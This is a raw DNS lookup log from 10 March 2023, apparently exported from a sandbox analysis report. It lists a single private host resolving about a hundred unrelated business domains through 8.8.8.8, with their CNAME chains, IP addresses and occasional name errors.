                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.300195932 CET8.8.8.8192.168.2.60x20e4No error (0)www.evcpa.comevcpa.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.300195932 CET8.8.8.8192.168.2.60x20e4No error (0)evcpa.com192.124.249.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.385412931 CET8.8.8.8192.168.2.60xcbeeNo error (0)www.nelipak.nl82.201.61.230A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.404725075 CET8.8.8.8192.168.2.60x6b88No error (0)www.transsib.comwww.studyrussian.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.404725075 CET8.8.8.8192.168.2.60x6b88No error (0)www.studyrussian.comstudyrussian.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.404725075 CET8.8.8.8192.168.2.60x6b88No error (0)studyrussian.com80.74.154.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.489126921 CET8.8.8.8192.168.2.60x34a4No error (0)www.iamdirt.comgcdn0.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.489126921 CET8.8.8.8192.168.2.60x34a4No error (0)gcdn0.wixdns.nettd-ccm-168-233.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.489126921 CET8.8.8.8192.168.2.60x34a4No error (0)td-ccm-168-233.wixdns.net34.117.168.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.497747898 CET8.8.8.8192.168.2.60x7a37No error (0)www.abdg.com192.252.154.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.897763014 CET8.8.8.8192.168.2.60x3036No error (0)www.com-sit.com172.67.70.223A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.897763014 CET8.8.8.8192.168.2.60x3036No error (0)www.com-sit.com104.26.10.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.897763014 CET8.8.8.8192.168.2.60x3036No error (0)www.com-sit.com104.26.11.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.417213917 CET8.8.8.8192.168.2.60x3fd6Name error (3)www.jroy.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.586529970 CET8.8.8.8192.168.2.60x8801No error (0)www.t-tre.com135.181.73.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.598176956 CET8.8.8.8192.168.2.60x5835No error (0)www.hummer.huhummer.huCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.598176956 CET8.8.8.8192.168.2.60x5835No error (0)hummer.hu185.80.51.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.602283001 CET8.8.8.8192.168.2.60x8469No error (0)www.xaicom.esxaicom.esCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.602283001 CET8.8.8.8192.168.2.60x8469No error (0)xaicom.es188.165.133.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.673624039 CET8.8.8.8192.168.2.60xfe3cNo error (0)www.vexcom.com104.21.55.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.673624039 CET8.8.8.8192.168.2.60xfe3cNo error (0)www.vexcom.com172.67.173.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.674309015 CET8.8.8.8192.168.2.60x3ce7No error (0)www.synetik.netsynetik.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.674309015 CET8.8.8.8192.168.2.60x3ce7No error (0)synetik.net193.166.255.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.747684956 CET8.8.8.8192.168.2.60x2618No error (0)www.wifi4all.nl188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.747684956 CET8.8.8.8192.168.2.60x2618No error (0)www.wifi4all.nl188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.768544912 CET8.8.8.8192.168.2.60x3785No error (0)www.edimart.hu81.2.194.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.780571938 CET8.8.8.8192.168.2.60x38a1No error (0)www.ora.ecnet.jpora.ecnet.jpCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.780571938 CET8.8.8.8192.168.2.60x38a1No error (0)ora.ecnet.jp60.43.154.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.907140017 CET8.8.8.8192.168.2.60xa6c7No error (0)www.naoi-a.com202.254.236.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.318523884 CET8.8.8.8192.168.2.60xeec4No error (0)www.fcwcvt.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.318523884 CET8.8.8.8192.168.2.60xeec4No error (0)www.fcwcvt.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.331109047 CET8.8.8.8192.168.2.60x8062No error (0)www.waldi.plwaldi.plCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.331109047 CET8.8.8.8192.168.2.60x8062No error (0)waldi.pl46.242.238.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.397186041 CET8.8.8.8192.168.2.60x4482No error (0)www.sjbs.orgsjbs.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.397186041 CET8.8.8.8192.168.2.60x4482No error (0)sjbs.org69.163.239.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.398727894 CET8.8.8.8192.168.2.60xd008No error (0)www.cokocoko.comtraff-5.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.398727894 CET8.8.8.8192.168.2.60xd008No error (0)traff-5.hugedomains.comhdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.398727894 CET8.8.8.8192.168.2.60xd008No error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com54.161.222.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.398727894 CET8.8.8.8192.168.2.60xd008No error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com34.205.242.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.405662060 CET8.8.8.8192.168.2.60xd67fNo error (0)www.aevga.comaevga.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.405662060 CET8.8.8.8192.168.2.60xd67fNo error (0)aevga.com108.167.164.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.675048113 CET8.8.8.8192.168.2.60x62e6No error (0)www.pcgrate.com172.67.201.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.675048113 CET8.8.8.8192.168.2.60x62e6No error (0)www.pcgrate.com104.21.66.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.681853056 CET8.8.8.8192.168.2.60x7d4No error (0)www.reglera.comreglera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.681853056 CET8.8.8.8192.168.2.60x7d4No error (0)reglera.com64.125.133.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:41.552136898 CET8.8.8.8192.168.2.60x941aNo error (0)www.stnic.co.uk77.68.50.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:41.555032969 CET8.8.8.8192.168.2.60xda8bNo error (0)www.snugpak.com172.67.165.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:41.555032969 CET8.8.8.8192.168.2.60xda8bNo error (0)www.snugpak.com104.21.73.182A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:41.630657911 CET8.8.8.8192.168.2.60x21feName error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:41.693586111 CET8.8.8.8192.168.2.60x9f25No error (0)www.speelhal.net217.19.237.54A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:41.754612923 CET8.8.8.8192.168.2.60x9ba5No error (0)www.maktraxx.commaktraxx.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:41.754612923 CET8.8.8.8192.168.2.60x9ba5No error (0)maktraxx.com72.44.93.236A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:41.868824005 CET8.8.8.8192.168.2.60x63b0No error (0)www.gpthink.com39.99.233.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:41.971014023 CET8.8.8.8192.168.2.60x437aNo error (0)www.jacomfg.com96.127.180.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:42.066364050 CET8.8.8.8192.168.2.60xf14aNo error (0)www.photo4b.com195.78.66.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:42.104649067 CET8.8.8.8192.168.2.60xbce5Name error (3)www.medisa.infononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:42.107903004 CET8.8.8.8192.168.2.60xe2d2No error (0)www.findbc.com13.248.216.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:42.107903004 CET8.8.8.8192.168.2.60xe2d2No error (0)www.findbc.com76.223.65.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:42.160797119 CET8.8.8.8192.168.2.60xf502No error (0)www.fink.com69.163.218.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:42.341195107 CET8.8.8.8192.168.2.60x2e71No error (0)www.mobilnic.net154.203.14.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:42.486321926 CET8.8.8.8192.168.2.60x3388No error (0)www.crcsi.orgcrcsi.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:42.486321926 CET8.8.8.8192.168.2.60x3388No error (0)crcsi.org165.227.252.190A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:42.620784998 CET8.8.8.8192.168.2.60xdcd9No error (0)www.cel-cpa.com104.196.26.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:44.988596916 CET8.8.8.8192.168.2.60xcf1cNo error (0)www.holleman.us51.79.51.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:45.857959032 CET8.8.8.8192.168.2.60xcf1cNo error (0)www.holleman.us51.79.51.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:46.551630974 CET8.8.8.8192.168.2.60xf66aNo error (0)www.c9dd.com188.166.152.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:46.571456909 CET8.8.8.8192.168.2.60x48dNo error (0)www.ora-ito.com213.186.33.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:46.657186985 CET8.8.8.8192.168.2.60xa7d2No error (0)www.jchysk.com208.97.178.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:46.711122990 CET8.8.8.8192.168.2.60xcb76No error (0)www.pupi.cz103.224.182.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:46.851514101 CET8.8.8.8192.168.2.60xcf1cNo error (0)www.holleman.us51.79.51.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:47.133780956 CET8.8.8.8192.168.2.60x30f0No error (0)www.nqks.comlive.websites.hibu.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:47.133780956 CET8.8.8.8192.168.2.60x30f0No error (0)live.websites.hibu.comhibu-4.zenedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:47.133780956 CET8.8.8.8192.168.2.60x30f0No error (0)hibu-4.zenedge.netzemonitor-websites-hibu-com.c.inregion.waas.oci.oraclecloud.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:47.133780956 CET8.8.8.8192.168.2.60x30f0No error (0)zemonitor-websites-hibu-com.c.inregion.waas.oci.oraclecloud.nethibu34.inregion.waas.oci.oraclecloud.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:47.133780956 CET8.8.8.8192.168.2.60x30f0No error (0)hibu34.inregion.waas.oci.oraclecloud.net147.154.0.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:47.231659889 CET8.8.8.8192.168.2.60x402dNo error (0)www.fe-bauer.de3.65.101.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:47.235169888 CET8.8.8.8192.168.2.60xb438No error (0)www.domon.commeubles-domon.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:47.235169888 CET8.8.8.8192.168.2.60xb438No error (0)meubles-domon.myshopify.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:47.235169888 CET8.8.8.8192.168.2.60xb438No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:47.296349049 CET8.8.8.8192.168.2.60x18e7No error (0)www.netcr.comtraff-1.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:47.296349049 CET8.8.8.8192.168.2.60x18e7No error (0)traff-1.hugedomains.comhdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:47.296349049 CET8.8.8.8192.168.2.60x18e7No error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com54.209.32.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:47.296349049 CET8.8.8.8192.168.2.60x18e7No error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com52.71.57.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:47.899507046 CET8.8.8.8192.168.2.60xa017No error (0)www.myropcb.com74.208.215.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:47.901204109 CET8.8.8.8192.168.2.60xea7fName error (3)www.koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:48.116921902 CET8.8.8.8192.168.2.60x4925No error (0)www.dayvo.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:48.116921902 CET8.8.8.8192.168.2.60x4925No error (0)www.dayvo.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:48.124969959 CET8.8.8.8192.168.2.60x178cNo error (0)www.pwd.orgpwd.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:48.124969959 CET8.8.8.8192.168.2.60x178cNo error (0)pwd.org208.109.214.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:48.193978071 CET8.8.8.8192.168.2.60xd6e0No error (0)www.kernsafe.com172.67.72.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:48.193978071 CET8.8.8.8192.168.2.60xd6e0No error (0)www.kernsafe.com104.26.2.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:48.193978071 CET8.8.8.8192.168.2.60xd6e0No error (0)www.kernsafe.com104.26.3.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:48.997980118 CET8.8.8.8192.168.2.60x2a58No error (0)www.stajum.com103.3.1.161A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:49.011722088 CET8.8.8.8192.168.2.60x1728No error (0)www.lrsuk.comlanguage-recruitment.eu-2.volcanic.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:49.011722088 CET8.8.8.8192.168.2.60x1728No error (0)language-recruitment.eu-2.volcanic.cloudd2kt7vovxa5e81.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:49.011722088 CET8.8.8.8192.168.2.60x1728No error (0)d2kt7vovxa5e81.cloudfront.net143.204.9.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:49.011722088 CET8.8.8.8192.168.2.60x1728No error (0)d2kt7vovxa5e81.cloudfront.net143.204.9.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:49.011722088 CET8.8.8.8192.168.2.60x1728No error (0)d2kt7vovxa5e81.cloudfront.net143.204.9.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:49.011722088 CET8.8.8.8192.168.2.60x1728No error (0)d2kt7vovxa5e81.cloudfront.net143.204.9.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:49.240715981 CET8.8.8.8192.168.2.60x6c97No error (0)www.jenco.co.uk104.21.23.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:49.240715981 CET8.8.8.8192.168.2.60x6c97No error (0)www.jenco.co.uk172.67.208.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:49.248855114 CET8.8.8.8192.168.2.60x80dNo error (0)www.fnw.usfnw.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:49.248855114 CET8.8.8.8192.168.2.60x80dNo error (0)fnw.us137.118.26.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:49.266669035 CET8.8.8.8192.168.2.60xd11No error (0)www.dgmna.comdgmna.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:49.266669035 CET8.8.8.8192.168.2.60xd11No error (0)dgmna.com192.124.249.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:49.295649052 CET8.8.8.8192.168.2.60xdef0Server failure (2)www.ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:49.303342104 CET8.8.8.8192.168.2.60x6e6dNo error (0)www.olras.com80.93.82.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:49.303364038 CET8.8.8.8192.168.2.60x39f5Name error (3)www.wkhk.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:49.304791927 CET8.8.8.8192.168.2.60x8cffNo error (0)www.baijaku.combaijaku.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:49.304791927 CET8.8.8.8192.168.2.60x8cffNo error (0)baijaku.com59.106.19.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:49.307209969 CET8.8.8.8192.168.2.60x430aNo error (0)www.quadlock.comquadlock.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:49.307209969 CET8.8.8.8192.168.2.60x430aNo error (0)quadlock.com70.39.251.249A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:49.360281944 CET8.8.8.8192.168.2.60x63b3No error (0)www.pdqhomes.comtraff-5.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:49.360281944 CET8.8.8.8192.168.2.60x63b3No error (0)traff-5.hugedomains.comhdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:49.360281944 CET8.8.8.8192.168.2.60x63b3No error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com34.205.242.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:49.360281944 CET8.8.8.8192.168.2.60x63b3No error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com54.161.222.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:49.513997078 CET8.8.8.8192.168.2.60xa73aNo error (0)www.pr-park.com118.27.125.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:49.614022970 CET8.8.8.8192.168.2.60x1032No error (0)www.ex-olive.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:49.637681007 CET8.8.8.8192.168.2.60xc0abNo error (0)www.yoruksut.com93.187.206.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:49.739655018 CET8.8.8.8192.168.2.60xdfa6No error (0)www.usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:50.085211039 CET8.8.8.8192.168.2.60x2ee9No error (0)www.wnsavoy.com96.91.204.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:50.110734940 CET8.8.8.8192.168.2.60x9137No error (0)www.rs-ag.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:50.110734940 CET8.8.8.8192.168.2.60x9137No error (0)www.rs-ag.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:50.145020962 CET8.8.8.8192.168.2.60xf4acNo error (0)www.alteor.clgcdn0.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:50.145020962 CET8.8.8.8192.168.2.60xf4acNo error (0)gcdn0.wixdns.nettd-ccm-168-233.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:50.145020962 CET8.8.8.8192.168.2.60xf4acNo error (0)td-ccm-168-233.wixdns.net34.117.168.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:50.178976059 CET8.8.8.8192.168.2.60xc28dNo error (0)www.valdal.com172.67.73.176A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:50.178976059 CET8.8.8.8192.168.2.60xc28dNo error (0)www.valdal.com104.26.6.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:50.178976059 CET8.8.8.8192.168.2.60xc28dNo error (0)www.valdal.com104.26.7.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:50.187817097 CET8.8.8.8192.168.2.60xbdcNo error (0)www.item-pr.comitem-pr.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:50.187817097 CET8.8.8.8192.168.2.60xbdcNo error (0)item-pr.com185.15.129.58A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:50.187817097 CET8.8.8.8192.168.2.60xbdcNo error (0)item-pr.com213.186.33.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:50.532567978 CET8.8.8.8192.168.2.60xfa0eNo error (0)www.mqs.com.brwww.mqs.com.br.cdn.gocache.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:50.532567978 CET8.8.8.8192.168.2.60xfa0eNo error (0)www.mqs.com.br.cdn.gocache.net170.82.174.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:50.532567978 CET8.8.8.8192.168.2.60xfa0eNo error (0)www.mqs.com.br.cdn.gocache.net170.82.173.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:50.693346024 CET8.8.8.8192.168.2.60x1b03No error (0)www.depalo.comghs.googlehosted.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:50.693346024 CET8.8.8.8192.168.2.60x1b03No error (0)ghs.googlehosted.com216.58.215.243A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:50.741885900 CET8.8.8.8192.168.2.60xf4acNo error (0)www.credo.edu.pl62.122.190.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:50.745665073 CET8.8.8.8192.168.2.60x2d8cName error (3)www.owsports.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:50.752743959 CET8.8.8.8192.168.2.60xa8fbNo error (0)www.petsfan.comtraff-4.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:50.752743959 CET8.8.8.8192.168.2.60xa8fbNo error (0)traff-4.hugedomains.comhdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:50.752743959 CET8.8.8.8192.168.2.60xa8fbNo error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com52.86.6.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:50.752743959 CET8.8.8.8192.168.2.60xa8fbNo error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com3.94.41.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:50.758836031 CET8.8.8.8192.168.2.60x729dNo error (0)www.elpro.si104.26.14.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:50.758836031 CET8.8.8.8192.168.2.60x729dNo error (0)www.elpro.si172.67.70.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:50.758836031 CET8.8.8.8192.168.2.60x729dNo error (0)www.elpro.si104.26.15.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:50.793819904 CET8.8.8.8192.168.2.60x57abNo error (0)www.vazir.se206.191.152.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:51.132731915 CET8.8.8.8192.168.2.60xa454No error (0)www.abart.plabart.plCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:51.132731915 CET8.8.8.8192.168.2.60xa454No error (0)abart.pl89.161.163.246A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:51.182141066 CET8.8.8.8192.168.2.60x10cdNo error (0)www.tvtools.fi172.67.152.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:51.182141066 CET8.8.8.8192.168.2.60x10cdNo error (0)www.tvtools.fi104.21.88.198A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:51.188261986 CET8.8.8.8192.168.2.60xb6e2No error (0)www.otena.com99.83.154.118A (IP address)IN (0x0001)false
